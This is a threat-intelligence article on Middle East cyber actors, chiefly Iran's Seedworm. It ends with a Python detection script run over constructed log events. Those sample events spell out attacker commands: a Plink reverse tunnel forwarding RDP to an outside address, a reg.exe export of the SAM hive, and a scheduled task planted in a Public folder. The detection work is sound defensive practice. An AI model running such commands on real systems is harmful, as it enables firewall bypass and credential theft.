The conflict in the Middle East continues to make headlines, as it has done since the October 7, 2023 Hamas attacks against Israel, which led to Israel retaliating with an ongoing onslaught on the Gaza Strip. The situation heated up further in recent weeks, with Israel and Iran both bombing each other’s territories, leading to U.S. intervention when it bombed Iran’s nuclear facilities, attempting to disrupt or destroy Iran’s nuclear program. Shortly after, U.S. President Donald Trump announced a ceasefire between the two countries, which, at time of writing, appears to be tentatively holding.
While most of the attention has focused on the physical actions occurring in this war, such as bombing, aid blockades and destruction, another potential front in the war is cyberspace, an increasingly common arena in modern conflicts. Both Israel and Iran, two of the main players in the current hostilities, have a history of carrying out destructive cyber attacks, including against each other.
We published a whitepaper last year discussing the cyber activity we typically see emanating from this region titled Conflict in the Middle East: An Overview of Cyber Threat Actors and Risks.
One of the most infamous cyber incidents to take place in this region was the deployment of the Stuxnet worm, which was designed to break laboratory equipment used by Iranian scientists to enrich uranium at the Natanz facility in Iran. This facility was one of the targets bombed by the U.S. in its recent strikes against Iran. Stuxnet was among the first known major nation-state cyberattacks that demonstrated hackers’ ability to manipulate and even destroy physical equipment. Stuxnet was designed to cause the spinning motors at the bottom of Natanz’s enrichment centrifuges to shatter. Researchers at Symantec first published details of it in 2010, after the worm spread outside of the Natanz facility and was found on private networks. Stuxnet has long been suspected to be the work of the U.S. and Israel, though it has never been claimed by either country. Given that Stuxnet was only discovered after it had spread to private networks, it is quite possible that cyber operations are currently being leveraged by and against these governments without our knowledge.
Recent media reports indicate potential cyber warfare impacting the region, including an attack by pro-Israel hackers dubbed Predatory Sparrow on the Iranian crypto exchange Nobitex, in which the attackers drained $90 million of cryptocurrency from the exchange. There were also reports that the Iranian group Damselfly was carrying out a targeted phishing campaign focused on high-profile Israeli individuals, particularly prominent academics, journalists, and security researchers (see the Damselfly profile for more).
Damselfly is just one of the key cyber actors who are most likely to be active in the current conflict, potentially targeting the networks of significant institutions in other nations for espionage, disruptive or destructive purposes.
Key Actors
We have reasonably good insight into some of the main Iranian actors and their activity. Iranian threat actors have become increasingly proficient in recent years. Not only has their malware improved, but they’ve also developed a strong social engineering capability that they’ve leveraged against targets of interest, even mounting digital honeytrap operations.
One of the hallmarks of Iran’s operations in cyberspace is that it periodically mounts destructive attacks against organizations in countries it deems hostile, which at the moment would obviously include the U.S., and its long-standing foe Israel. That creates a risk for organizations in those countries because these attacks are about sending a message rather than stealing information, which means that any organization in the country targeted could be in the firing line.
There are a couple of Iranian threat actors worth noting that are among the most active at the moment, the first of which is Seedworm (aka MuddyWater, Temp Zagros, Static Kitten). Seedworm is a long-standing Iranian group, which usually mounts classic espionage attacks for the purposes of spying and information gathering. The group has been active since 2017, and CISA has described Seedworm as “a subordinate element within the Iranian Ministry of Intelligence and Security.” Seedworm originally focused on victims in the Middle East but later broadened its scope to target telecommunications, defense, local government, and oil and natural gas organizations in Asia, Africa, Europe, and North America. The group develops its own custom malware as well as using dual-use and living-off-the-land tools.
While originally focused on espionage, in recent times Seedworm has begun carrying out destructive attacks that masquerade as ransomware, either in collaboration with another threat group or through a sub-group within it. These attacks involve ransomware known as DarkBit and, while it does encrypt computers like regular ransomware, the attackers seem more interested in making a statement than collecting a ransom. Some of the ransom notes they’ve left have had an unusually political tone, implying the ransomware was deployed more as retaliation than as a money-making exercise.
Case Study: Seedworm targets smaller organizations
A recent campaign tentatively linked to Seedworm focused on smaller organizations, including organizations in utility, transport, and the manufacturing sector outside the Middle East.
The attackers took advantage of compromised home routers that were infected with the Mirai malware. It isn’t clear if this access was purchased or if the infections were initiated by Seedworm itself, but it had access to numerous compromised home routers from which it attacked the victim organizations by proxying through them. These attacks did not come from Iranian IP addresses; they came from small routers in a whole range of countries. Seedworm used this network of hacked routers to scan for vulnerable IIS servers, and then used a variety of known vulnerabilities to gain access to these servers. Once on these servers, it used Plink, a legitimate off-the-shelf tool, to create a reverse RDP tunnel. Inbound RDP connections were blocked by the firewall, but Plink is able to create an outbound SSH connection back to the attacker, which is allowed, and that connection is then used to tunnel classic RDP traffic, bypassing the firewall.
Seedworm then sideloaded Brute Ratel, a commercial red-teaming and adversarial attack simulation tool, and used a scheduled task for persistence. The attackers used Brute Ratel to obtain credentials and, once they had them, began to move laterally to other machines, ultimately obtaining more credentials by dumping the SAM with reg.exe. Seedworm then gained access to file servers and SQL servers seeking data of interest. It launched SQL injection attacks across the internal network to gain access to the SQL servers.
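As an added example (not code from the original report), the following Python turns the observable steps of this case study into detection rules and runs them over a handful of constructed process-creation events: a Plink remote port forward carrying RDP, a scheduled task whose action lives in a user-writable directory, a SAM hive export via reg.exe, and a shell spawned by the IIS worker process. Hostnames, the key=value log format and the command lines are all constructed for the example.

```python
import re

# Constructed process-creation events (not real telemetry) in a simple
# key=value form: host, parent image, image and full command line.
SAMPLE_EVENTS = [
    'host=iis01 parent=w3wp.exe image=cmd.exe cmdline="cmd.exe /c whoami"',
    'host=iis01 parent=cmd.exe image=plink.exe cmdline="plink.exe -N -R 3389:127.0.0.1:3389 user@203.0.113.10 -P 443"',
    'host=iis01 parent=cmd.exe image=schtasks.exe cmdline="schtasks.exe /create /tn Updater /sc onlogon /tr C:\\Users\\Public\\svc.exe"',
    'host=fs02 parent=cmd.exe image=reg.exe cmdline="reg.exe save hklm\\sam C:\\Windows\\Temp\\s.hiv"',
    'host=fs02 parent=explorer.exe image=reg.exe cmdline="reg.exe query hkcu\\Software\\Classes"',
    'host=ws07 parent=explorer.exe image=plink.exe cmdline="plink.exe -ssh admin@jumphost"',
]

EVENT_RE = re.compile(r'host=(\S+) parent=(\S+) image=(\S+) cmdline="(.*)"$')

def parse_event(line):
    """Split one log line into (host, parent, image, cmdline); None if malformed."""
    m = EVENT_RE.match(line)
    return m.groups() if m else None

def classify(parent, image, cmdline):
    """Return the name of the first matching detection rule, or None."""
    parent, image, cmd = parent.lower(), image.lower(), cmdline.lower()
    # Plink remote port forward (-R) exposing the RDP port: the outbound
    # SSH session that carries inbound RDP, as described in the case study.
    if image == "plink.exe" and re.search(r"(^|\s)-r\s+\S*3389", cmd):
        return "plink_reverse_rdp_tunnel"
    # SAM hive exported with reg.exe: credential-theft staging.
    if image == "reg.exe" and re.search(r"\bsave\b.*\\sam\b", cmd):
        return "reg_save_sam"
    # Scheduled task whose action lives in a user-writable directory.
    if image == "schtasks.exe" and "/create" in cmd and (
            "\\users\\public\\" in cmd or "\\temp\\" in cmd):
        return "schtasks_from_writable_path"
    # IIS worker process spawning a shell: the web-server foothold.
    if parent == "w3wp.exe" and image in ("cmd.exe", "powershell.exe"):
        return "webserver_spawned_shell"
    return None

def scan(lines):
    """Run every rule over every line; return (host, rule, cmdline) hits."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue  # malformed line: skip rather than crash the pipeline
        host, parent, image, cmdline = ev
        rule = classify(parent, image, cmdline)
        if rule:
            hits.append((host, rule, cmdline))
    return hits
```

Benign events such as `reg.exe query` or an interactive `plink.exe -ssh` session produce no hit, which is the false-positive check worth keeping when these rules are ported to a real SIEM.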